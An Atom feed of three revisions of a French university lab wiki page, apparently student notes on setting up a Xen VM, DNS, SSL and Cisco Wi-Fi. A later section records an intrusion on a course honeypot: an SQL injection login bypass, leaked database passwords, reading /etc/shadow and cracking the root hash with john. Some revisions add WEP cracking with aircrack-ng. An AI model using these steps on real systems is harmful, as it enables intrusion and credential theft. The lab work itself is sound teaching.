https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&feedformat=atom&user=Nekhlas-
Wiki d'activités IMA - Contributions de l’utilisateur [fr]
2026-05-13T09:33:37Z
Contributions de l’utilisateur
MediaWiki 1.29.2
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=54503
TP sysres IMA5sc 2020/2021 G7
2020-12-14T14:20:41Z
<p>Nekhlas- : /* Sécurisation par certificat SSL */</p>
<hr />
<div><br />
== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
Connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
Commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br> MAJ gateway : 161<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24 MAJ: 193.48.57.172<br />
<br>Netmask: 255.255.255.240 MAJ: 255.255.255.224<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15<br />
<br />
Repartition des volumes logiques : <br />
lvdisplay <br />
lvrename <br />
<br />
Dans le fichier de configuration de la machine : girolle.cfg<br />
on rajoute var et home :<br />
lignes 'phy:/.../xdva3'<br />
<br />
<br />
Commandes pour creer et acceder a la VM :<br />
<br />
xl create -c etc/xen/girolle.cfg<br />
'''xl console girolle'''<br />
<br />
Commandes sur la vm: <br />
<br />
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 <br />
<br />
au prealable il faut <br />
<br />
<br />
1) formater la partition : <br />
mkfs -t ext4 /dev/xvda4<br />
<br />
2) Monter la partition que l'on veut sur /mnt <br />
mount /dev/xvda4 /mnt<br />
3) Migrer tout le contenu de var dans mnt <br />
cd /var<br />
mv * /mnt<br />
<br />
4) Dans le fichier fstab rajouter :<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
5) Unmout mnt <br />
umount /mnt<br />
<br />
6) Monter tout sur dev/xdva<br />
mount -a <br />
7)Verification <br />
df<br />
dpkg -l<br />
<br />
== Activation connexion ssh ==<br />
<br />
On modifie le fichier /etc/ssh/sshd_config<br />
<br />
On décommente la ligne PermissionRoot : <br />
# Authentication:<br />
#LoginGraceTime 2m<br />
PermitRootLogin yes<br />
<br />
Puis on l'active avec la commande :<br />
service sshd restart<br />
<br />
On peut se connecter à la machine par ssh root@girolle.site (mot de passe root habituel)<br />
<br />
==Redirection DNS==<br />
<br />
=== Sur Gandi ===<br />
<br />
Achat d'un nom de domaine : girolle.site<br />
Création d'un Glue Record : 193.48.57.182<br />
<br />
Serveur DNS primaire : ns1.girolle.site (193.48.57.182)<br />
Serveur DNS secondaire : ns6.gandi.net (217.70.177.40)<br />
<br />
=== Sur la machine virtuelle ===<br />
<br />
Installation de bind9<br />
On modifie les fichiers dans /etc/bind/named.conf.<br />
Dans /etc/bind/named.conf.options<br />
options {<br />
directory "/etc/bind";<br />
listen-on-v6 { any; };<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Dans /etc/bind/named.conf.local<br />
zone "girolle.site" {<br />
type master;<br />
file "girolle.site/girolle";<br />
allow-transfer (217.70.177.40;};<br />
};<br />
<br />
Dans db.girolle.site<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.girolle.site. postmaster.girolle.site(<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.girolle.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.182<br />
@ IN MX 100 girolle.site.<br />
<br />
www IN CNAME ns1<br />
<br />
Puis pour le relancer :<br />
service bind9 restart<br />
<br />
<br />
Configuration pour la réception du mail de confirmation du certificat SSL<br />
Installer Postfixe pour avoir accès au fichier aliases<br />
Internet Site<br />
girolle.site<br />
<br />
Dans /etc/aliases<br />
admin: root<br />
<br />
Puis ajouter dans newaliases<br />
Cela va permettre de récupérer le mail de confirmation de Gandi envoyé à admin@girolle.site<br />
<br />
https://www.jeffgeerling.com/blogs/jeff-geerling/viewing-email-linux-using<br />
<br />
<br />
Installation de mailx pour lire les mails reçus<br />
apt-install bsd-mailx<br />
Pour consulter le mail de vérification<br />
mailx admin<br />
<br />
=== Sécurisation par certificat SSL ===<br />
<br />
Génération du CSR à l'aide d'openssl<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout girolle.site.key -out girolle.site.csr<br />
<br />
Réception du mail de vérification avec une URL et un mot de passe ce qui nous permet de récupérer le fichier girolle.site.crt<br />
<br />
Configuration du serveur apache2<br />
<br />
Activation du ssl sur apache2 <br />
ae2enmod ssl<br />
<br />
Ajout dans le fichier 000-default.conf dans /etc/apache2/sites-available<br />
<VirtualHost *:80> <br />
ServerName www.girolle.site <br />
Redirect / https://www.girolle.site <br />
.... <br />
</VirtualHost> <br />
<br />
<VirtualHost 193.48.57.182:443><br />
DocumentRoot /var/www/html2<br />
ServerName girolle.site<br />
SSLEngine on<br />
SSLCertificateFile /root/girolle.site.crt<br />
SSLCertificateKeyFile /root/girolle.site.key<br />
SSLCertificateChainFile /root/GandiCA.pem<br />
</VirtualHost><br />
<br />
verifications:<br />
host -t soa girolle.site ns6.gandi.net<br />
Sur Zabeth : host www.girolle.site<br />
<br />
== Configuration des bornes Wi-Fi ==<br />
<br />
Borne classique : Cisco - AIR-CAP1602I-E-K9<br />
<br />
Configuration IOS en CLI :<br />
<br />
aaa new-model<br />
!<br />
!<br />
aaa group server radius radius_girolle<br />
server 193.48.57.182 auth-port 1812 acct-port 1813<br />
!<br />
aaa authentication login eap_group1 group radius_group1<br />
aaa authentication login eap_girolle group radius_girolle<br />
! <br />
dot11 ssid SSID_GIROLLE<br />
vlan 107<br />
authentication open eap eap_girolle <br />
authentication network-eap eap_girolle <br />
authentication key-management wpa<br />
!<br />
!<br />
...<br />
interface Dot11Radio0<br />
encryption vlan 101 mode ciphers aes-ccm tkip<br />
<br />
<br />
...<br />
interface BVI1<br />
ip address 10.60.100.10 255.255.255.0<br />
!<br />
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22<br />
<br />
<br />
<br />
10.60.100.10 : adresse IP fixe du point d'accès<br />
<br />
<br />
Commandes et verifications /<br />
ap(config)#interface BVI1<br />
ap(config-if)# ip address 10.60.100.10 255.255.255.0<br />
ap(config-if)#exit<br />
ap#write<br />
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION<br />
ap#ping 10.60.100.2 <br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:<br />
.!!!!<br />
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
test second routeur : ne fonctionne pas car pas d'addresse ip<br />
ap#ping 10.60.100.1<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:<br />
.....<br />
Success rate is 0 percent (0/5)<br />
<br />
Configurer l'adresse par defaut:<br />
<br />
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2<br />
ap(config)#exit<br />
ap#sh ip route<br />
<br />
<br />
Test ping notre machine virtuelle girolle : <br />
ap#ping 193.48.57.182<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:<br />
!!!!!<br />
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
==Configuration WLC==<br />
<br />
Utilisation de bornes Cisco 2802i<br />
<br />
Connection via minicom -os (9600 bauds)<br />
<br />
enable <br />
capwap ap ip <ip> <netmask> <gateway><br />
<br />
==Intrusion honey.plil.info ==<br />
<br />
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1<br />
<br />
Admin : admin jesuislechef admin Administrateur<br />
<br />
Creer le fichier etc/phpmyadmin/config-db.php<br />
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : <br />
<?php<br />
##<br />
## database access settings in php format<br />
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf<br />
## by /usr/sbin/dbconfig-generate-include<br />
##<br />
## by default this file is managed via ucf, so you shouldn't have to<br />
## worry about manual changes being silently discarded. *however*,<br />
## you'll probably also want to edit the configuration file mentioned<br />
## above too.<br />
##<br />
$dbuser='phpmyadmin';<br />
$dbpass='gencovid19';<br />
$basepath='';<br />
$dbname='phpmyadmin';<br />
$dbserver='localhost';<br />
$dbport='3306';<br />
$dbtype='mysql';<br />
<br />
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ <br />
connexion id : root<br />
mdp: gencovid19<br />
<br />
une fois connecter on recherche les identifiants des utilisateurs ssh :<br />
id = rex <br />
mdp: <br />
<br />
connexion ssh : ssh rex@honey.plil.info<br />
/etc/shadow pour trouver la cle de cryptage du mdp root <br />
copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::<br />
installation de john <br />
john nom du fichier<br />
<br />
pour aller plus rapidement creer un dictionnaire a partir des indices donnés : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'<br />
utiliseer crunch?<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On utilise le paquet aircrack-ng.<br />
<br />
La commande<br />
airmon-ng<br />
permet de voir le nom du réseau sans fil: wlan0mon<br />
<br />
airmon-ng start wlan0mon<br />
<br />
On scanne les réseaux :<br />
airodump-ng --encrypte wep wlan0mon<br />
<br />
On choisi un réseau parmi ceux disponibles. Par exemple la cracotte08 est sur le canal 7 et a pour BSSID 04:DA:D2:9C:50:57.<br />
<br />
[[Fichier:capturewep1.png|600px]]<br />
<br />
On lance avec la commande :<br />
<br />
airodump-ng --write testwep --channel 7 --bssid 04:DA:D2:9C:50:57 wlan0mon<br />
<br />
aircrack-ng -z testwep-01.cap<br />
<br />
[[Fichier:capturewep2.png|600px]]</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=54502
TP sysres IMA5sc 2020/2021 G7
2020-12-14T14:20:29Z
<p>Nekhlas- : /* Sur la machine virtuelle */</p>
<hr />
<div><br />
== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
Connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
Commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br> MAJ gateway : 161<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24 MAJ: 193.48.57.172<br />
<br>Netmask: 255.255.255.240 MAJ: 255.255.255.224<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15<br />
<br />
Repartition des volumes logiques : <br />
lvdisplay <br />
lvrename <br />
<br />
Dans le fichier de configuration de la machine : girolle.cfg<br />
on rajoute var et home :<br />
lignes 'phy:/.../xdva3'<br />
<br />
<br />
Commandes pour creer et acceder a la VM :<br />
<br />
xl create -c etc/xen/girolle.cfg<br />
'''xl console girolle'''<br />
<br />
Commandes sur la vm: <br />
<br />
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 <br />
<br />
au prealable il faut <br />
<br />
<br />
1) formater la partition : <br />
mkfs -t ext4 /dev/xvda4<br />
<br />
2) Monter la partition que l'on veut sur /mnt <br />
mount /dev/xvda4 /mnt<br />
3) Migrer tout le contenu de var dans mnt <br />
cd /var<br />
mv * /mnt<br />
<br />
4) Dans le fichier fstab rajouter :<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
5) Unmout mnt <br />
umount /mnt<br />
<br />
6) Monter tout sur dev/xdva<br />
mount -a <br />
7)Verification <br />
df<br />
dpkg -l<br />
<br />
== Activation connexion ssh ==<br />
<br />
On modifie le fichier /etc/ssh/sshd_config<br />
<br />
On décommente la ligne PermissionRoot : <br />
# Authentication:<br />
#LoginGraceTime 2m<br />
PermitRootLogin yes<br />
<br />
Puis on l'active avec la commande :<br />
service sshd restart<br />
<br />
On peut se connecter à la machine par ssh root@girolle.site (mot de passe root habituel)<br />
<br />
==Redirection DNS==<br />
<br />
=== Sur Gandi ===<br />
<br />
Achat d'un nom de domaine : girolle.site<br />
Création d'un Glue Record : 193.48.57.182<br />
<br />
Serveur DNS primaire : ns1.girolle.site (193.48.57.182)<br />
Serveur DNS secondaire : ns6.gandi.net (217.70.177.40)<br />
<br />
=== Sur la machine virtuelle ===<br />
<br />
Installation de bind9<br />
On modifie les fichiers dans /etc/bind/named.conf.<br />
Dans /etc/bind/named.conf.options<br />
options {<br />
directory "/etc/bind";<br />
listen-on-v6 { any; };<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Dans /etc/bind/named.conf.local<br />
zone "girolle.site" {<br />
type master;<br />
file "girolle.site/girolle";<br />
allow-transfer (217.70.177.40;};<br />
};<br />
<br />
Dans db.girolle.site<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.girolle.site. postmaster.girolle.site(<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.girolle.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.182<br />
@ IN MX 100 girolle.site.<br />
<br />
www IN CNAME ns1<br />
<br />
Puis pour le relancer :<br />
service bind9 restart<br />
<br />
<br />
Configuration pour la réception du mail de confirmation du certificat SSL<br />
Installer Postfixe pour avoir accès au fichier aliases<br />
Internet Site<br />
girolle.site<br />
<br />
Dans /etc/aliases<br />
admin: root<br />
<br />
Puis ajouter dans newaliases<br />
Cela va permettre de récupérer le mail de confirmation de Gandi envoyé à admin@girolle.site<br />
<br />
https://www.jeffgeerling.com/blogs/jeff-geerling/viewing-email-linux-using<br />
<br />
<br />
Installation de mailx pour lire les mails reçus<br />
apt-install bsd-mailx<br />
Pour consulter le mail de vérification<br />
mailx admin<br />
<br />
=== Sécurisation par certificat SSL ===<br />
<br />
Génération du CSR à l'aide d'openssl<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout girolle.site.key -out girolle.site.csr<br />
<br />
Réception du mail de vérification avec une URL et un mot de passe ce qui nous permet de récupérer le fichier girolle.site.crt<br />
<br />
Configuration du serveur apache2<br />
<br />
Activation du ssl sur apache2 <br />
ae2enmod ssl<br />
<br />
Ajout dans le fichier 000-default.conf dans /etc/apache2/sites-available<br />
<VirtualHost *:80> <br />
ServerName www.girolle.site <br />
Redirect / https://www.girolle.site <br />
.... <br />
</VirtualHost> <br />
<br />
<VirtualHost 193.48.57.182:443><br />
DocumentRoot /var/www/html2<br />
ServerName girolle.site<br />
SSLEngine on<br />
SSLCertificateFile /root/girolle.site.crt<br />
SSLCertificateKeyFile /root/girolle.site.key<br />
SSLCertificateChainFile /root/GandiCA.pem<br />
</VirtualHost><br />
<br />
== Configuration des bornes Wi-Fi ==<br />
<br />
Borne classique : Cisco - AIR-CAP1602I-E-K9<br />
<br />
Configuration IOS en CLI :<br />
<br />
aaa new-model<br />
!<br />
!<br />
aaa group server radius radius_girolle<br />
server 193.48.57.182 auth-port 1812 acct-port 1813<br />
!<br />
aaa authentication login eap_group1 group radius_group1<br />
aaa authentication login eap_girolle group radius_girolle<br />
! <br />
dot11 ssid SSID_GIROLLE<br />
vlan 107<br />
authentication open eap eap_girolle <br />
authentication network-eap eap_girolle <br />
authentication key-management wpa<br />
!<br />
!<br />
...<br />
interface Dot11Radio0<br />
encryption vlan 101 mode ciphers aes-ccm tkip<br />
<br />
<br />
...<br />
interface BVI1<br />
ip address 10.60.100.10 255.255.255.0<br />
!<br />
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22<br />
<br />
<br />
<br />
10.60.100.10 : adresse IP fixe du point d'accès<br />
<br />
<br />
Commandes et verifications /<br />
ap(config)#interface BVI1<br />
ap(config-if)# ip address 10.60.100.10 255.255.255.0<br />
ap(config-if)#exit<br />
ap#write<br />
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION<br />
ap#ping 10.60.100.2 <br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:<br />
.!!!!<br />
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
test second routeur : ne fonctionne pas car pas d'addresse ip<br />
ap#ping 10.60.100.1<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:<br />
.....<br />
Success rate is 0 percent (0/5)<br />
<br />
Configurer l'adresse par defaut:<br />
<br />
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2<br />
ap(config)#exit<br />
ap#sh ip route<br />
<br />
<br />
Test ping notre machine virtuelle girolle : <br />
ap#ping 193.48.57.182<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:<br />
!!!!!<br />
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
==Configuration WLC==<br />
<br />
Utilisation de bornes Cisco 2802i<br />
<br />
Connection via minicom -os (9600 bauds)<br />
<br />
enable <br />
capwap ap ip <ip> <netmask> <gateway><br />
<br />
==Intrusion honey.plil.info ==<br />
<br />
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1<br />
<br />
Admin : admin jesuislechef admin Administrateur<br />
<br />
Creer le fichier etc/phpmyadmin/config-db.php<br />
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : <br />
<?php<br />
##<br />
## database access settings in php format<br />
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf<br />
## by /usr/sbin/dbconfig-generate-include<br />
##<br />
## by default this file is managed via ucf, so you shouldn't have to<br />
## worry about manual changes being silently discarded. *however*,<br />
## you'll probably also want to edit the configuration file mentioned<br />
## above too.<br />
##<br />
$dbuser='phpmyadmin';<br />
$dbpass='gencovid19';<br />
$basepath='';<br />
$dbname='phpmyadmin';<br />
$dbserver='localhost';<br />
$dbport='3306';<br />
$dbtype='mysql';<br />
<br />
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ <br />
connexion id : root<br />
mdp: gencovid19<br />
<br />
une fois connecter on recherche les identifiants des utilisateurs ssh :<br />
id = rex <br />
mdp: <br />
<br />
connexion ssh : ssh rex@honey.plil.info<br />
/etc/shadow pour trouver la cle de cryptage du mdp root <br />
copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::<br />
installation de john <br />
john nom du fichier<br />
<br />
pour aller plus rapidement creer un dictionnaire a partir des indices donnés : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'<br />
utiliseer crunch?<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On utilise le paquet aircrack-ng.<br />
<br />
La commande<br />
airmon-ng<br />
permet de voir le nom du réseau sans fil: wlan0mon<br />
<br />
airmon-ng start wlan0mon<br />
<br />
On scanne les réseaux :<br />
airodump-ng --encrypte wep wlan0mon<br />
<br />
On choisi un réseau parmi ceux disponibles. Par exemple la cracotte08 est sur le canal 7 et a pour BSSID 04:DA:D2:9C:50:57.<br />
<br />
[[Fichier:capturewep1.png|600px]]<br />
<br />
On lance avec la commande :<br />
<br />
airodump-ng --write testwep --channel 7 --bssid 04:DA:D2:9C:50:57 wlan0mon<br />
<br />
aircrack-ng -z testwep-01.cap<br />
<br />
[[Fichier:capturewep2.png|600px]]</div>
Nekhlas-
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&diff=54501
TP sysres IMA5sc 2020/2021 G7
2020-12-14T14:19:55Z
<p>Nekhlas- : /* Sur la machine virtuelle */</p>
<hr />
<div><br />
== Explication Infrastructure ==<br />
<br />
==Installation VM==<br />
<br />
Connexion ssh:<br />
ssh pifou@capbreton.plil.info<br />
<br />
Commande (en root su -):<br />
xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force<br />
<br> MAJ gateway : 161<br />
<br>Nom de domaine: girolle.site<br />
<br>Adresse IP : 100.64.0.24 MAJ: 193.48.57.172<br />
<br>Netmask: 255.255.255.240 MAJ: 255.255.255.224<br />
<br>Adresse MAC : 00:16:3E:3E:E3:15<br />
<br />
Repartition des volumes logiques : <br />
lvdisplay <br />
lvrename <br />
<br />
Dans le fichier de configuration de la machine : girolle.cfg<br />
on rajoute var et home :<br />
lignes 'phy:/.../xdva3'<br />
<br />
<br />
Commandes pour creer et acceder a la VM :<br />
<br />
xl create -c etc/xen/girolle.cfg<br />
'''xl console girolle'''<br />
<br />
Commandes sur la vm: <br />
<br />
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 <br />
<br />
au prealable il faut <br />
<br />
<br />
1) formater la partition : <br />
mkfs -t ext4 /dev/xvda4<br />
<br />
2) Monter la partition que l'on veut sur /mnt <br />
mount /dev/xvda4 /mnt<br />
3) Migrer tout le contenu de var dans mnt <br />
cd /var<br />
mv * /mnt<br />
<br />
4) Dans le fichier fstab rajouter :<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
5) Unmout mnt <br />
umount /mnt<br />
<br />
6) Monter tout sur dev/xdva<br />
mount -a <br />
7)Verification <br />
df<br />
dpkg -l<br />
<br />
== Activation connexion ssh ==<br />
<br />
On modifie le fichier /etc/ssh/sshd_config<br />
<br />
On décommente la ligne PermissionRoot : <br />
# Authentication:<br />
#LoginGraceTime 2m<br />
PermitRootLogin yes<br />
<br />
Puis on l'active avec la commande :<br />
service sshd restart<br />
<br />
On peut se connecter à la machine par ssh root@girolle.site (mot de passe root habituel)<br />
<br />
==Redirection DNS==<br />
<br />
=== Sur Gandi ===<br />
<br />
Achat d'un nom de domaine : girolle.site<br />
Création d'un Glue Record : 193.48.57.182<br />
<br />
Serveur DNS primaire : ns1.girolle.site (193.48.57.182)<br />
Serveur DNS secondaire : ns6.gandi.net (217.70.177.40)<br />
<br />
=== Sur la machine virtuelle ===<br />
<br />
Installation de bind9<br />
On modifie les fichiers dans /etc/bind/named.conf.<br />
Dans /etc/bind/named.conf.options<br />
options {<br />
directory "/etc/bind";<br />
listen-on-v6 { any; };<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Dans /etc/bind/named.conf.local<br />
zone "girolle.site" {<br />
type master;<br />
file "girolle.site/girolle";<br />
allow-transfer (217.70.177.40;};<br />
};<br />
<br />
Dans db.girolle.site<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.girolle.site. postmaster.girolle.site(<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.girolle.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.182<br />
@ IN MX 100 girolle.site.<br />
<br />
www IN CNAME ns1<br />
<br />
Puis pour le relancer :<br />
service bind9 restart<br />
<br />
<br />
Configuration pour la réception du mail de confirmation du certificat SSL<br />
Installer Postfixe pour avoir accès au fichier aliases<br />
Internet Site<br />
girolle.site<br />
<br />
Dans /etc/aliases<br />
admin: root<br />
<br />
Puis ajouter dans newaliases<br />
Cela va permettre de récupérer le mail de confirmation de Gandi envoyé à admin@girolle.site<br />
<br />
https://www.jeffgeerling.com/blogs/jeff-geerling/viewing-email-linux-using<br />
<br />
<br />
Installation de mailx pour lire les mails reçus<br />
apt-install bsd-mailx<br />
Pour consulter le mail de vérification<br />
mailx admin<br />
<br />
<br />
verifications:<br />
host -t soa girolle.site ns6.gandi.net<br />
Sur Zabeth : host www.girolle.site<br />
<br />
=== Sécurisation par certificat SSL ===<br />
<br />
Génération du CSR à l'aide d'openssl<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout girolle.site.key -out girolle.site.csr<br />
<br />
Réception du mail de vérification avec une URL et un mot de passe ce qui nous permet de récupérer le fichier girolle.site.crt<br />
<br />
Configuration du serveur apache2<br />
<br />
Activation du ssl sur apache2 <br />
ae2enmod ssl<br />
<br />
Ajout dans le fichier 000-default.conf dans /etc/apache2/sites-available<br />
<VirtualHost *:80> <br />
ServerName www.girolle.site <br />
Redirect / https://www.girolle.site <br />
.... <br />
</VirtualHost> <br />
<br />
<VirtualHost 193.48.57.182:443><br />
DocumentRoot /var/www/html2<br />
ServerName girolle.site<br />
SSLEngine on<br />
SSLCertificateFile /root/girolle.site.crt<br />
SSLCertificateKeyFile /root/girolle.site.key<br />
SSLCertificateChainFile /root/GandiCA.pem<br />
</VirtualHost><br />
<br />
== Configuration des bornes Wi-Fi ==<br />
<br />
Borne classique : Cisco - AIR-CAP1602I-E-K9<br />
<br />
Configuration IOS en CLI :<br />
<br />
aaa new-model<br />
!<br />
!<br />
aaa group server radius radius_girolle<br />
server 193.48.57.182 auth-port 1812 acct-port 1813<br />
!<br />
aaa authentication login eap_group1 group radius_group1<br />
aaa authentication login eap_girolle group radius_girolle<br />
! <br />
dot11 ssid SSID_GIROLLE<br />
vlan 107<br />
authentication open eap eap_girolle <br />
authentication network-eap eap_girolle <br />
authentication key-management wpa<br />
!<br />
!<br />
...<br />
interface Dot11Radio0<br />
encryption vlan 101 mode ciphers aes-ccm tkip<br />
<br />
<br />
...<br />
interface BVI1<br />
ip address 10.60.100.10 255.255.255.0<br />
!<br />
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22<br />
<br />
<br />
<br />
10.60.100.10 : adresse IP fixe du point d'accès<br />
<br />
<br />
Commandes et verifications /<br />
ap(config)#interface BVI1<br />
ap(config-if)# ip address 10.60.100.10 255.255.255.0<br />
ap(config-if)#exit<br />
ap#write<br />
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION<br />
ap#ping 10.60.100.2 <br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:<br />
.!!!!<br />
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
test second routeur : ne fonctionne pas car pas d'addresse ip<br />
ap#ping 10.60.100.1<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:<br />
.....<br />
Success rate is 0 percent (0/5)<br />
<br />
Configurer l'adresse par defaut:<br />
<br />
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2<br />
ap(config)#exit<br />
ap#sh ip route<br />
<br />
<br />
Test ping notre machine virtuelle girolle : <br />
ap#ping 193.48.57.182<br />
Type escape sequence to abort.<br />
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:<br />
!!!!!<br />
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms<br />
<br />
==Configuration WLC==<br />
<br />
Utilisation de bornes Cisco 2802i<br />
<br />
Connection via minicom -os (9600 bauds)<br />
<br />
enable <br />
capwap ap ip <ip> <netmask> <gateway><br />
<br />
==Intrusion honey.plil.info ==<br />
<br />
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1<br />
<br />
Admin : admin jesuislechef admin Administrateur<br />
<br />
Creer le fichier etc/phpmyadmin/config-db.php<br />
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : <br />
<?php<br />
##<br />
## database access settings in php format<br />
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf<br />
## by /usr/sbin/dbconfig-generate-include<br />
##<br />
## by default this file is managed via ucf, so you shouldn't have to<br />
## worry about manual changes being silently discarded. *however*,<br />
## you'll probably also want to edit the configuration file mentioned<br />
## above too.<br />
##<br />
$dbuser='phpmyadmin';<br />
$dbpass='gencovid19';<br />
$basepath='';<br />
$dbname='phpmyadmin';<br />
$dbserver='localhost';<br />
$dbport='3306';<br />
$dbtype='mysql';<br />
<br />
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ <br />
connexion id : root<br />
mdp: gencovid19<br />
<br />
une fois connecter on recherche les identifiants des utilisateurs ssh :<br />
id = rex <br />
mdp: <br />
<br />
connexion ssh : ssh rex@honey.plil.info<br />
/etc/shadow pour trouver la cle de cryptage du mdp root <br />
copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::<br />
installation de john <br />
john nom du fichier<br />
<br />
